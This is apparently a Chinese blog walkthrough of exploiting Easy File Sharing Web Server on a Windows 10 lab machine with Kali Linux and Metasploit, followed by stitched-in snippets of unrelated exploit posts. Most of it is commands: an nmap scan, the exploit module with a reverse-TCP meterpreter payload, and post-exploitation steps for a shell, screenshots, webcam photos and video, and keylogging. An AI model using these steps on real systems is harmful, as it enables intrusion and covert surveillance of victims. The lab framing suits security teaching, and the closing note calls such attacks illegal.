攻擊環境:攻擊者系統:虛擬機器下kali linux靶機系統:win10(需要開啟easy file sharing服務)攻擊者ip:10.3.134.27靶機ip:10.3.37.56攻擊者和靶機在同乙個wifi下,保證在同一網段裡,能互相ping通。漏洞利用:esayfilesharing
準備工作完成,可以開始內網滲透之旅了。
首先我們先用nmap掃瞄一下靶機開了哪些服務root@kali:~# nmap -sv 10.3.37.56
namp掃瞄結果
我們可以看到80埠和443埠開放了,對應的是easy file sharing web server,滿足easyfilesharing漏洞攻擊,進入下一步。
開啟msf控制台,設定攻擊引數
root@kali:~# msfconsole #進入控制台,稍微等一下msf > search easyfilesharing #查詢我們要用的漏洞
搜尋結果
我們選擇最新的乙個,2017-06-12的版本,並設定payload。
msf > use exploit/windows/http/easyfilesharing_post #使用這個漏洞msf exploit(windows/http/easyfilesharing_post) > set payload windows/meterpreter/reverse_tcp #設定攻擊payload
我們用show options看一下需要什麼攻擊引數
設定引數
根據required屬性看一下哪些是需要配置的,其中一些是配置好的,我們只需將其他的配置好就ok了。
msf exploit(windows/http/easyfilesharing_post) > set lhost 10.3.134.27 #設定本地ipmsf exploit(windows/http/easyfilesharing_post) > set rhost 10.3.37.56 #設定遠端ip
引數都配置好了,接著就是激動人心的exploit了。
msf exploit(windows/http/easyfilesharing_post) > exploit #攻擊
顯示這個頁面,說明你成功了
逐個輸入以下命令,試試
meterpreter > getuid #獲取靶機uidmeterpreter > shell #進入靶機shellmeterpreter > screenshot #靶機截圖meterpreter > webcam_snap #用靶機攝像頭拍照meterpreter > webcam_stream #用靶機攝像頭錄影meterpreter > keyscan_start #開啟鍵盤記錄meterpreter > keyscan_dump #捕獲鍵盤記錄meterpreter > keyscan_stop #停止鍵盤記錄
我們來測試幾個好玩的1st.捕捉靶機鍵盤記錄
捕捉到靶機鍵盤記錄(hack hack)
2nd.捕捉靶機截圖
捕捉靶機截圖
捕捉靶機截圖
3rd.用靶機攝像頭拍照
利用靶機攝像頭拍照
靶機攝像頭畫素略渣,不過看看我們的公教區學習環境吧
我們做攻擊實驗都是在環境都配置好的情況下,現實生活中不會有這麼好的肉雞。而且網路攻擊屬於違法行為,人生路漫漫,且行且珍惜
kali攻擊命令大全 利用msf攻擊win10
攻擊環境 攻擊者系統 虛擬機器下kali linux靶機系統 win10 需要開啟easy file sharing服務 攻擊者ip 10.3.134.27靶機ip 10.3.37.56攻擊者和靶機在同乙個wifi下,保證在同一網段裡,能互相ping通。漏洞利用 esayfilesharing 準備...
msf利用0DAY漏洞獲取shell
安裝cve 2018 8174 exp 然後發現沒轉殖下來,所以這裡我直接用xshell上傳了zip包並解壓在本目錄 進入我們的檔案目錄 cd cve 2018 8174 exp master 生成惡意html檔案 將檔案移動到apache根目錄 mv exploit.html var www ht...
10 軟體通用漏洞利用
例項1 gitstack通用漏洞利用 gitstack是一款windows上設定自己的專用git伺服器的軟體。利用它可以建立乙個前沿版本控制系統,無需任何git知識。開發用的 gitstack也使得安全並保持伺服器更新變得非常簡單。gitstack構建在真正git for windows的頂部,並且...